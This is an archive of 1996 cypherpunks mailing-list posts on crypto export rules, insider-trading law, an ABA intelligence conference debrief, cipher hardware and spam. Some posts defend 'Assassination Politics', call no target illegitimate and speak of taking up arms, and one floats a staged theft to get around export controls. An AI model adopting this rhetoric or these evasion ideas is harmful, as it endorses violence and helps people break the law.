From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 26 Sep 1996 11:53:00 +0800
To: Phil Fraering <pgf@acadian.net>
Subject: Re: Possible snake oil?
In-Reply-To: <Pine.SOL.3.93.960925154728.17155A-100000@stiletto.acadian.net>
Message-ID: <Pine.SUN.3.94.960925212318.2802C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Phil Fraering wrote:

> 
> I ran across this at the web site of a New Orleans area web authoring
> company. I checked with a friend of mine of long standing on this list,
> and he assured me that the information was probably false.
> 
> (Here it is...)
> 
> <begin included excerpt from web page)
> 
> [deleted] has one of the fastest and most powerful web networks in the

[...]

> ObLegalQuestion:
> 
> Should I have been less coy about the corporation name?

It is their publication.  Why should you be afraid of copying it?

So long as you don't make allegations that are malicious.

> 
> 
> Phil Fraering          The above is the opinion of neither my internet
> pgf@acadian.net        service provider nor my employer.
> 318/261-9649               
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 26 Sep 1996 12:14:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: PGP plugin for Netscape?
Message-ID: <199609260237.VAA02054@homeport.org>
MIME-Version: 1.0
Content-Type: text


I could swear I read something about a PGP plugin called livepgp, and
Altavista can't find it, and I can't glimpse it in my archives of the
list.

Anyone got a pointer?

Please post to the list; making it more likely that a search engine
will find this in the future, and we won't get a rash of 'me toos.'

Thanks,

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 26 Sep 1996 15:56:06 +0800
To: cypherpunks@toad.com
Subject: ABA Conference on Law Enforcement and Intelligence - Debrief
Message-ID: <Pine.SUN.3.94.960925215748.2802F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


The American Bar Association Standing Committee on Law and 
National Security - Law Enforcement and Intelligence Conference - 
Debrief

The ABA's Standing Committee on Law and National Security is one 
of the more successful Committees to come out of the ABA.  It's 
conferences and early morning breakfast briefings and lectures 
are attended by some of the leading experts in the fields of 
National Security, Law Enforcement, and Intelligence and no small 
number of the beltway power elite.

I'm not sure if many people outside the legal community 
understand the degree to which attorney's have impacted and 
thrived in both the law enforcement and the intelligence 
communities.  In fact many, if not most, CIA case officers and 
station chiefs, as well as field operatives, are attorneys or 
have law degrees.  Other intelligence organizations are no 
different.  It should come as little surprise then if a committee 
of the ABA should happen to attract a surprising amount of 
intelligence professionals.

This conference was no exception.  Spooks, Feds, Legislators, and 
even a few Kooks were in attendance.  Members of the British, 
American, Canadian, and German intelligence communities were in 
attendance.  A colleague and I attended the majority of the 
conference and except where noted the reflections below are a 
summary of our collective notes and thoughts on the subject 
matter discussed.  I'm taking a broad view of relevance to 
cypherpunks, but I will omit that which seems clearly not of 
direct or somewhat indirect interest.


Part One:

A Changed World for Law Enforcement and Intelligence in the 21st 
Century

Thursday, September 19

7:45 AM  Registration and Continental Breakfast

8:15 AM  Welcome Remarks
Paul Schott Stevens
Chair
ABA Standing Committee on Law and National Security

8:30 AM  I.  An Overview of a Changing World.

*The Traditional Relationship of Law Enforcement, Foreign 
Intelligence and National Security (1945-1995):

*How Have Other nations Balanced Legal and National Security 
Requirements and Responded to a Changed World.

*The Changed Threats to U.S. National Security- New Problems and 
Priorities

Elizabeth R. Rindskopf
Bryan Cave
Former General Counsel, Central Intelligence Agency
Member, Standing Committee on Law and National Security

Ms. Rindskopf outlined the three classic "periods" of 
intelligence community and mission development in U.S. history 
and set the stage for the discussions to follow.

Interesting subjects she did touch on included section 715 of the 
Senate intelligence bill.  The section allows the law enforcement 
community to request assistance from foreign intelligence in 
collection efforts on foreigners outside of the United States.

The BNC and BCCI scandals were discussed as a backdrop of the 
hazards of law enforcement and intelligence separation.

Zoe Baird
Senior Vice President and General Counsel
Atena Life and Casualty Company
Member, Standing Committee on Law and National Security.

Ms. Baird discussed the dangers presented by globalization and 
new technologies.  She highlighted the point that crime 
globalization often follows corporate globalization and the 
manner in which a single individual's ability to cause harm has 
increased in scope (The NYNEX Hack).  Also interesting was her 
discussion of the manner in which the more organized elements of 
criminal activity worked to take advantage of the very open 
society in the United States (Fund raising, publications, 
anonymous communications).

Those activities once merely violations of criminal law are, she 
argued, now increasingly national security concerns and that 
national security events impact elections in very dramatic and 
direct ways (Atlanta and Israel bombings as examples).

Crime, she pointed out, gets about an 80% response in the polls, 
where as "National Security and Foreign Policy" get perhaps a 3% 
response.  Merging these elements together serves an 
administration.  She also pointed out the trend toward making 
these issues generally more accessible to the public.  
(Specifically by use of language.  "Transnational threats"- which 
was a term of art for non-state terrorism and organized crime- 
becomes "Global Crime" or "Global Lawlessness."

Ms. Baird ended by asking how the firewalls between Law 
Enforcement and Intelligence could be rebuilt with these new 
considerations in mind.

I considered her a balanced cynic.  She managed to get across 
some very realpolitik notions without much murmuring from the 
(limited) civil libertarian crowd.

David Bickford
Former Legal Adviser to the British Intelligence Services (MI5-
MI6)

Mr. Bickford has in past served as a conduit between British 
Intelligence services and the United States.  He is well known 
and respected among the American and European Intelligence 
communities.  Knowing Mr. Bickford I can also say that he pays a 
great deal of attention to who his audience is and speaks to 
their interests with disarming accuracy.  His discussion is 
important because it is a good insight into what the policy 
makers in the United States are looking at.

He began by highlighting the new international nature of crime.  
No longer is it confined to power blocs.  "Multi-jurisdictional 
illegality" is increasingly a concern.  New highspeed 
communications channels are a contributor and organized crime 
groups are possessed of extremely advanced administration 
abilities.  They are leaner and meaner because they use 
computers, encryption, communications, and use up less resources 
in administration.  The ability to make the organization smaller 
also makes it harder to penetrate.  In this environment, 
international cooperation is essential.  He called for more 
active and expansive extraterritorial jurisdiction for certain 
crimes, and lamented his own country's lack of enthusiasm for 
this concept though they are slowly "coming around."

His solutions included the labeling of organizations, even when 
they are not geographically based, as "illegal international 
organizations" and using all means to combat them.  He envisions 
a wide cooperation by the G7 to accomplish this, leaving such 
organizations with no safe haven.  Sanctions regimes formerly 
employed only as against "rogue states" and countries in disfavor 
should be employed to destroy these illegal international 
organizations wherever they are.  He indicated that the other G7 
states should build on the recent Clinton Executive Order which 
seizes the assets of such organizations which may be located in 
the jurisdictions of the G7.  He called for measures to deny 
these assets access to the major securities and international 
finance markets and proposed that only organizations like the NSA 
could confront and complete these tasks.  Intelligence, he 
argued, is the only organization that can keep up with 
international crime and as a result there should be developed 
court processes to introduce intelligence into criminal cases 
while protecting the more sensitive information (sources and 
methods) as irrelevant.  "Evil men" have taken an "early lead."

$500 billion a year comes out of the United States alone in money 
laundering.  400 billion in assets is attributed to drug cartels, 
80% of which are Cali Cartel assets.  There are over 250 
international Russian criminal organizations currently operating.

Mr. Phillip Heymann
James Barr Ames Professor and Director,
Center for Criminal Justice
Harvard Law School
Member: Standing Committee on Law and National Security

[Didn't find his comments particularly relevant]

II. Political Challenges in the World Environment

*Breakup of the U.S.S.R.

*Loss of National Sovereignty and Control by Nation States

*Erosion of National Legal Systems
Military Threats at the Subnational Level:
The Terrorism Dilemma

(This looked very much like the section given to the Soviet 
Analysts, who no longer have much of a job to do).

Mr. Morton H. Halperin
Senior Fellow
Council on Foreign Relations
Former Special Assistant to the President and
Senior Director for Democracy, National Security Council

[Canceled]

Mr. Peter Rodman
Director, National Security Programs
Nixon Center for Peace and Freedom
and Former Deputy Assistant to the President for National 
Security Affairs

Mr. Rodman discussed the new "trans-national areas."  Terrorism, 
corruption, economic and criminal activity.  He discussed the 
side effects of collapsing empires (the rise of organized crime 
to enforce property and contract rights that cannot be enforced 
by the government, the shift of power to the local from the 
regional and executive areas) and discussed, in this context, the 
importance of avoiding petty squabbles over issues like trade and 
the like because they threaten the more important strategic 
cooperation that will be necessary to battle global and 
transnational criminal activity.

Ms. Jessica E. Stern
Consultant
Lawrence Livermore National Laboraory and
Former Director, Russian, Uklrainian and Eursian Affairs,
National Security Council

Ms. Stern discussed the severe proliferation problems presented 
by a weak Russia, particularly the weakening of MPCA (Material 
Protection Control and Accounting).

11:15 AM  III.  Technical and Practical Changes in the Relevant 
World Environment

*Global Technologies Emerge
*"Equal Access" to Advanced Technology by State and Private 
Actors
* Change in Size, Type and Location of National Security Threats: 
Challenge for Modern Intelligence and Law Enforcement

Stewart Baker
Steptoe and Johnson
Former General Counsel, National Security Agency
Member, Standing Committee on Law and National Security

Mr. Baker's remarks were brief, but he discussed the evening of 
the odds with respect to government and private organizations 
caused by technology.

Admiral William O. Studeman
United States Navy (retired)
Former Acting Director of Central Intelligence

Admiral Studeman discussed "Information Warfare," pointing out 
specifically that advanced societies were more vulnerable because 
of their financial, banking and revenue system's dependence on 
computer.  Power, air traffic control, public safety and media 
were also mentioned in passing.

Admiral Studeman went on to call for more intense secrecy in law 
enforcement (not intelligence) as to collection methods and new 
technology.  He called passionately for funding for the DigiTel 
program as well as a "key escrow" policy.

Anthony Oettiger
Chairman, Program on Information Resources Policy
Harvard University

Mr. Oettinger was perhaps the only moderate speaker in the 
conference.  He discussed Executive Order 13010 (establishing the 
Critical Infrastructure Protection organization) and called for 
more private sector input in policy making (Banks, markets, 
businesses want to make their own security arrangements, and are 
not very interested in paying much attention to the suits at 
their door who claim 'Hi, we're from the government, we are here 
to help..'

He pointed out the difference between the movements in Airline 
Security (which is drifting from privately maintained, to 
publicly maintained).and Internet security (which is doing the 
reverse).

He called for reasoned response to the new threats which did not 
commit expensive intelligence and law enforcement resources to 
combat the single hacker.  Proper threat assessing is important, 
and intelligence should be used to pinpoint the weak points.

Walter Pincus
National Security Affairs Reporter
The Washington Post

Mr. Pincus asked if (a lovely analogy to chicken little and 
osterages with their heads in the sand).  His most interesting 
remarks regarded the wisdom of dedicating such substantial 
resources to repell non-strategic efforts to disrupt networks.  
(Hackers, lone gunmen, etc.)  He questioned.  Doesn't, afterall, 
a strategic attack require much more preperation?  Should we 
really allow the personality of e.g., Louis Freeh, who has the 
capital dazzled from his glow, to direct these resources?

12:30 PM Luncheon
John Deutch
Director, Central Intelligence Agency
[Cancelled in the wake of the investigation into alleged CIA drug 
connections in California]

Part Two:
The Implications of a Changed World for a Set of Critical 
Decisions

2:00 PM  IV.  Protections Against New High Tech Dangers; Problems 
of Encryption, Information Warfare and Computer Theft

[forthcoming - remainder of conference and analysis]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 26 Sep 1996 14:49:19 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <199609252211.RAA02676@manifold.algebra.com>
Message-ID: <Pine.SUN.3.94.960925220250.2802J-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Igor Chudov @ home wrote:

> > >> Soon I am going to be going overseas to Japan, and I want to take
> > >> my notebook with me so I can keep up with everything, however, I have
> > >> encrypted my hard drive and usually encrypt my mail.  Is this in
> > >> violation of the ITAR to keep everything the same when I go over?
> 
> Gentlemen, us customs does not give shit about what you take out
> on your diskettes.
> 
> When I went to Russia recenty, I took PGP for DOS, and no one gave
> me any problem.
> 
> IANAL

Obviously not, you've just confessed to a felony.

> 
> 	- Igor.
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 26 Sep 1996 12:40:42 +0800
To: Phil Fraering <pgf@acadian.net>
Subject: Re: Possible snake oil?
In-Reply-To: <Pine.SOL.3.93.960925154728.17155A-100000@stiletto.acadian.net>
Message-ID: <Pine.LNX.3.94.960925220253.1227A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Phil Fraering wrote:

> Date: Wed, 25 Sep 1996 16:00:40 -0500 (CDT)
> From: Phil Fraering <pgf@acadian.net>
> To: cypherpunks@toad.com
> Subject: Possible snake oil?
> 

[Acual post deleted]

> 
> ObLegalQuestion:
> 
> Should I have been less coy about the corporation name?
> 
> 

It won't make a difference either way: if he company does care, it takes
all of 10 seconds to prove that the message could have been fakemailed
anyway...

As to whether or not they'd have grounds, no, they wouldn't, assuming you
didn't actually edit the quote, and assuming you didn' (and you didn't)
acually acuse them of anything.  You merely quesioned if they were
correct, and if so, how so... which is perfectly inocent.

 --Deviant
Talking much about oneself can also be a means to conceal oneself.
		-- Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 26 Sep 1996 15:50:48 +0800
To: cypherpunks@toad.com
Subject: Re: Insider Trading - What constitutes "Disclosure" ?
Message-ID: <v02130500ae6f613b4014@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Posted-Date: Thu, 26 Sep 1996 00:40:14 -0400
>Date: Thu, 26 Sep 1996 00:40:14 -0400 (EDT)
>From: Black Unicorn <unicorn@schloss.li>
>X-Sender: unicorn@polaris
>To: Steve Schear <azur@netcom.com>
>Subject: Re: Insider Trading - What constitutes "Disclosure" ?
>MIME-Version: 1.0
>
>On Wed, 25 Sep 1996, Steve Schear wrote:
>
>> >Often the choice faced by the investor who has material non-public
>> >information is characterized as "disclose or abstain," meaning that the
>> >investor may either trade after disclosing or abstain from trading on the
>> >information.
>> >
>> >A few people have asked me what constitutes disclosure.
>> >
>> >I've not researched the latest cases, but the generally accepted "best
>> >description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833
>> >(2d Cir.1968), cert. denied.
>> >
>> > The reading of a news release, which promoted Coates into
>> >action, is merely the first step in the process of dissemination required
>> >for compliance with the regulatory objective of providing all investors
>> >with an equal opportuinity to make informed investment judgements.
>> >Assuming that the contents of the official release could have been
>> >instantaneously be acted upon, at the minimum Coates should have waited
>> >until the news could reasonably have been expcted to appear over the media
>> >of widest circulation, the Dow Jones broad tape, rather than hastening to
>> >insure an advantage to himself and his broker son-in-law.
>> >
>>
>> It would seem to me that if I operated an open listserver, upon which
>> financial information regularly appeared and which any trader (serious or
>> otherwise) might subscribe, my information should be held in the same legal
>> regard as DJ.
>
>I disagree.  If the information appears only on your listserver it will
>not, in my view, be considered released.  You'll note above that the
>reading of a news release, which eventually propogated to Canada and New
>York, still was not enough to limit liability for Coates.  I hardly think
>a small circulation electronic mailing list will be considered sufficent
>either.
>
>> If not, the SEC has in effect created a monopoly for
>> Dow-Jones and its ilk and effectively impede or excluded other news sources
>> (e.g., Internet feeds) as legit means for generating market awareness, and
>> therefore revenue.
>
>Correct.
>
>> I and many others occassionally trade on public
>> information from narrower sources than DJ (e.g., market newsletters).
>
>But you and others are (I hope) not insiders or direct tipees.
>You also note that you trade on "public information."  So long as you keep
>it that way you should be alright.
>
>You will be putting yourself in a interesting position if material
>non-public information ever shows up on your newsletter and is later the
>subject of investigation.
>
>> Sometimes DJ and others pick up info from these sources and sometimes they
>> don't (or not immediately).  Does that mean those trading on this data
>> published not yet picked up by DJ may be trading illegally?  If so, this is
>> totally unjust and wrongheaded.
>
>The case mans what it says.  Until the information reaches the sources of
>largest distribution it is still "non-public."  What is a source of
>largest distrubution?  Ask a judge.  I would simply be careful and
>prudent.  You could easily be in trouble for trading on information which
>you "knew or should have known was material, non-public information."
>
>There is, of course, a distinction between the trader who reads an article
>and trades on it and a trader who hears over a mailing list from a
>corporate insider that a major fraud in the company has been discovered.
>
>If your newsletter carries hints of the big merger before it happens and a
>trader later points to it as the source of his tip, you could be in
>serious trouble.  God forbid they get it in your head that you are
>distributing inside information.  Of course you can imagine the headlines.
>
>"Internet crime network foiled.  Hundreds of subscribers capitalize on
>inside information."
>
>As for unjust and wrongheaded, welcome to the American concept of
>securities regulation.
>
>> -- Steve
>
>--
>I hate lightning - finger for public key - Vote Monarchist
>unicorn@schloss.li
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haggis@brutus.bright.net (Hamish)
Date: Thu, 26 Sep 1996 15:29:15 +0800
To: cypherpunks@toad.com
Subject: RE: your mail
Message-ID: <v01540b02ae6f640401a9@[205.212.124.145]>
MIME-Version: 1.0
Content-Type: text/plain


Hey Look, the president of the U.S. is on this mailing list!!!!!!!!!
Let's tell him what we think of him and his defense department, and his
secret service and his. . .well, entire administration and laws (what about
that dandy CDA?????????)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 26 Sep 1996 15:45:25 +0800
To: cypherpunks@toad.com
Subject: Re: Mitsubishi MISTY LSI
Message-ID: <199609260534.WAA00788@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:55 PM 9/25/96 -0700, Bill Frantz wrote:
>>   Nikkei English News, 24 September 1996. 
>> 
>>   [Mitsubishi] fabricated the chip as a gate array using a 
>>   0.5 micron CMOS process and its own proprietary 
>>   encryption algorithm MISTY. Operating at a maximum 
>>   input/output speed of 40 megahertz, the chip can handle 
>>   32 bits per clock cycle. 
>
>Does anyone have a reason not to consider this algorithm snake oil?  e.g.:
>Was it developed by a well known cryptographer?
>Has it been vetted by someone/some organization with reputation?
>I other words, why should we trust it?


There's not nearly enough information provided to know for sure.  
However, I'd think that any company which went to the trouble to build 
such a chip (custom, 0.5 micron process, etc) would go to the little extra 
effort to verify the algorithm is secure.

Generally, hardware is held to a higher standard because the difficulty of 
repair is higher:  Usually, you have to replace a chip.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 26 Sep 1996 15:58:39 +0800
To: PhneCards@aol.com
Subject: Re: More proposals for European censorship
In-Reply-To: <960925181200_529562477@emout03.mail.aol.com>
Message-ID: <324A17BE.4C09@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


PhneCards@aol.com wrote:
> Did you know this company is using your email address as part of
> an unlawful email bomb?

I signed up for this Internet service through GTE.  I haven't got the 
foggiest idea what a "email bomb" is, nor do I care.  I can't possibly 
be doing anything illegal by logging on to this service and receiving 
and posting email to cypherpunks, and if someone else is, why are you 
telling me?

> I would advise you to write to them at cypherpunks@toad.com
> and owner-cypherpunks@toad.com and advise them to stop
> using your email address for this type of activity.

I don't know what you're talking about.  Maybe if you dropped the 
"Computerese" and wrote in plain English, I could understand what you're 
saying.  Are you saying (by analogy) that if someone posted my picture 
on a milk carton claiming I was lost, that I'd have to write someone a 
letter of explanation to say I wasn't lost?  And how do I *really* know 
I'm not lost, anyway?  I'd prefer that you just leave me alone.

> It is illegal to use a invalid return email address.  If this
> continues, I will
> be forced to prosecute the return email address - which they are
> making to look like you.

Well, this is all quite fascinating, but it's not what I signed up for. 
Are you suggesting that I would be obliged to witness against someone? 
I've been in court before, and I know how lawyers like to insist on Yes 
or No answers, but it rarely works for me. I just get so confused....

> Below is the letter that I received in my email box
> In a message dated 96-09-25 13:58:31 EDT, you write:
> >Subj:  Re: More proposals for European censorship
> >Date:  96-09-25 13:58:31 EDT
> >From:  dthorn@gte.net (Dale Thorn)
> >Sender:        owner-cypherpunks@toad.com
> >To:    asgaard@Cor.sos.sll.se (Asgaard)
> >CC:    cypherpunks@toad.com

[text deleted]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 26 Sep 1996 13:14:16 +0800
To: cypherpunks@toad.com
Subject: Newsgroup proposal: misc.anonymous
Message-ID: <Pine.LNX.3.95.960925223111.314A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In an effort to get anonymity and message pools more widespread, I think it
would be a good idea to establish a newsgroup for anonymous message pools that
would get the same distribution as any other newsgroup in the "big 8".  The
"misc" hierarchy is probably the best place for such a newsgroup since it
already carries groups like "misc.misc" and "misc.test".  Does anyone have any
suggestions or objections?

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMknvNSzIPc7jvyFpAQHnmAf/SmvkV71/p3V2ZzCZApBk2TXD3wVifxi/
ljjRcuaGGs/iDJ1xKuTDGj5qIicM3Y3CSsnedS2g15RtAIpU7IdBKNsa4D55F2vI
TJSElzqoqPMlAQRLq45v92DlG9d5zQopfqlT9bkGXZ1DDfTGg2q+F0HUqLYAZC1r
DVU+iShjWUjX+0qxvKDClXSLLizdz6QHjTUTuE0PEdYf03KI0rqt/Dceh3iU2BWm
bHYS20mHLv0fjdGMEVzBtul6mNfkcrYR2eyYxpWKtPtGzrw3NsSrI+ZYxT74I8S6
e2uB+Evnvl0dauLwhxWrdo4ILW0A9ekKfSrEVkRybBSKp8di2vwCqw==
=cgnu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 26 Sep 1996 15:56:50 +0800
To: "Adam Shostack" <adam@homeport.org>
Subject: Re: Taking crypto out of the U.S.
Message-ID: <19960926055511781.AAA230@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996 06:26:31 -0500 (EST), Adam Shostack wrote:

>| >Theres a personal use exemption.  Michael Froomkin's web page has a
>| >pointer to it.

>| What if your laptop gets "stolen"?  Or you sell it for a plane ticket home
>| after your wallet gets pinched?

>You're required to report it to the Feds.  RTFU.

Yeah, but you can't be persecuted.    So what happens if Joe-Cryptographer
writes a *great* NSA-stumping crypto program - not for export - and it just
happens to get pinched (The police might even recover it!)?  Outside
distribution w/o penalties...

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 26 Sep 1996 14:58:35 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: Kiddie porn on the Internet
In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu>
Message-ID: <199609260356.WAA00453@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

HAL wrote:
> [AP drivel deleted]
> Go talk to someone who is a member of an organisation like the PLO or
> Hammas and pretty near the top. If you think that they would be intimidated
> for a moment by AP you have another think comming.
> If it could the US would have assasinated Saddam by now. It can't because it
> is too difficult to find out where exactly a person will be. Assasination
> attempts against Castro similarly failed. 

     Some would say that 1) Saddam (as a problem) was _created_ by the US, 
and it would not be in the interest of certain people to have him die.
Along the same lines, Castro, while not exactly friendly (and who can blame 
him) to the US, is also not a threat, and never really has been. Killing 
him would serve no purpose.

     Killing some one (the physical act, not the emotional consequences) is
easy. Denyability is a little (only a little) tougher. 

> If you care to look at the history of Cambodia you will see that Lon Nol
> assumed the presidency despite the knowledge that there was practically no ch
> chance of defeating the Khumer Rouge and that he would almost certainly be dead
> in less than a week as a result. 

     There are always Captians who go down with the ship, Boys who stick 
their fingers in dykes, and Some fool leading the charge when the odds
are overwhelming. This is either the highest calling (to fight back against 
all odds, and refuse to give in) or pure stupidity (he who runs away lives
to fight another day). You pick. 

> 
> Both the assumption AP rests on are utterly false. It is neither possible
> to assasinate people at will nor will it intimidate. 

    If by "at will" you mean _any time_ _any where_, yeah. Short of building
your own nuclear device, yeah. If you mean there are people who can't be 
gotten to, then no. Everyman has his price, and his coin. 


    The second time AP is implicated in a murder, and is not stopped, then 
it will _start_ to intimidate. More likely it will be stopped. 

> In addition *ANYONE* who attempted to implement AP would be someone *I*
> would regard as a tyrant and therefore a legitimate target by the rules
> of AP. I would naturally consider it permissable to engage the support of 
> others in their suppression. Since we now live in the fantasy land of AP
> I can now wipe out anyone anywhere so I eliminate all AP leaders.

     There are no illegitimate targets. 

> I think that this type of talk is incredibly dangerous. There are plenty of
> people on the net who are psychos and if you spread AP drivel arround someone
> is going to act on it. Probably not Jim Bell, more likely a psychopath who
> lurks on the list but does not post. 

     Doubtful. It would take more than one talented person. It would take
an organization, and a permanent net connextion. This would be difficult for
a lone psychopath to carry out.

> If you call for people to be murdered - and let us not forget that this is
> what AP is about you bear the responsibility when someone acts on it.

     Bullshit. Is Einstein morally responsible for the Atomic Bomb? 

     Col. Colt for the murders that the guns he created accomplished? 

     Ronald McDonald & his PR firm for all of the obese people in this 
     country?

> I consider AP to be very close to calling for the assasination of the 
> President of the USA. That is a federal crime and there is a law that 
> requires the investigation of any such threats. I suggest that people
> think *very* carefully before engaging in this dangerous nonsense any
> further. 

     Driving 65 is very close to driving 66, which is against the law.
I suggest that people think very carefully before driving at 65 miles 
per hour. 

> PS it is not censorship to stop people from advocating murder.

     Yes, it is. Especially when other people do it all the time, and don't
get punished. Clinton just "murdered" a bunch of people in Iraq. He talked
about it, then he did it. He calls it "War". So do I. I am involved in a 
war for _my_ rights. I will probably loose, but I must do what I determine
is right. Assinating the president would not further my goals. At no time 
in the foreseeable future would killing the president bring me any closer to
my goals. This being so, killing the president would be a stupid idea.

     When I joined the Marine Corps, I took an oath to protect this country,
the constitution, and the government against all enemies foreign and 
domestic. To me, the order I wrote them is the order of presidence. The
government is attacking the constitution regularly. I do what I can to stop 
that. If that means taking up arms as either a part of organized revolt, or
a long lunatic, so be it. 

    

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkn+1/ee0/pvOCipAQE6vQP9E3Ra8UqMYZ3TQqyWxipJa5PDdH25ZDEv
NKFPw4LDAoivF9C69criJ65lIDqNTWTOSJXY//yjyG/MkNRuS9UBzPr12PbzVafV
TTY2LPXfuZoUt6AHlA6yAJpZwa3mmifRPTUQbKtc/sMIQJ3ugrZirw6/Wbzra3E+
KEclgyuiiC0=
=zt4Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 26 Sep 1996 16:04:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <199609260141.SAA15334@mail.pacifier.com>
Message-ID: <324A1C11.5E19@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 07:24 AM 9/24/96 -0700, Dale Thorn wrote:
> >Lessee if I have this right, now.  We have basically three scenarios:
> >1. Allow the status quo to continue (the justice system scam now run 
> >by Janet Reno/Louis Freeh types et al.
> >2. Allow the people some democracy in applying justice through AP.
> >3. Sometime in the future, build the Gort(?) robots, as in The Day
> >The Earth Stood Still, and let them do the job.

> That's about it.  I long ago noticed the similarity between AP and the
> fictional Gort.
> Problem is, Gort would have to be programmed. How would you write such 
> a program?  Governments would want their hand in it.  They'd insist on
> "government exceptions" to rules, like:   "All violence is forbiddden!
> (except for violence by duly authorized government employees!)"
> Not very practical.

Indeed it may not be practical to try such a program on current 
computers.  I've had thoughts for some time about an analogy where each 
person in a civilization represents a cell in a single brain, and so on, 
so perhaps AP is merely a portion of the program for this "brain".  As 
to what happens when you try to concentrate a disproportionate amount of 
the programming task into a few hands, that appears to be the situation 
we have now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 26 Sep 1996 16:09:15 +0800
To: "PhneCards@aol.com>
Subject: Re: A daily word of caution in reference Tim C[unt] May
Message-ID: <19960926060948234.AAA88@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996 18:11:22 -0400, PhneCards@aol.com wrote:

>Did you know this company is using your email address as part of
>an unlawful email bomb?

>I would advise you to write to them at cypherpunks@toad.com
>and owner-cypherpunks@toad.com and advise them to stop
>using your email address for this type of activity.

Hmmmm...   Unlawful email bomb?   My understanding is that the entire problem
of spaming, which you reportedly enage in (and admitted such in another
message),  is at best a grey area.  Otherwise you'd probably be needing that
legal department to defend yourself.

I'd suggest you read up on the concept of a mailing list.  
cyperpunks@toad.com is one of those.   If you send a message there, it'll
reach all 1400 people who've actually signed up (note the difference from
spamming? They *requested* it!).   To me it looks like you got subscribed.   
send a message to majordomo@toad.com with the text of "unsubscribe
cypherpunks" and you'll be removed.   Speaking of which, remove me from the
list you mentioned in your other message....

>It is illegal to use a invalid return email address.

Really?   I must have missed the E-Mail Regulations Act of 1996 . . . 
Speaking of which, 
Reply-to:	adamsc@io-online.com (Chris Adams)
must be a valid address; your inane message reached me, right?

>Below is the letter that I received in my email box

[Deleted]

Hmmmm...  The message I sent to the list actually got distributed to the
list.  That majordomo thingie must work, after all...

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 26 Sep 1996 16:40:32 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Public Schools
In-Reply-To: <oLiTuD1w165w@bwalk.dm.com>
Message-ID: <324A206C.44AE@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> Phil Fraering <pgf@acadian.net> writes:
> > Without vouchers, you don't say anything about the intelligence of
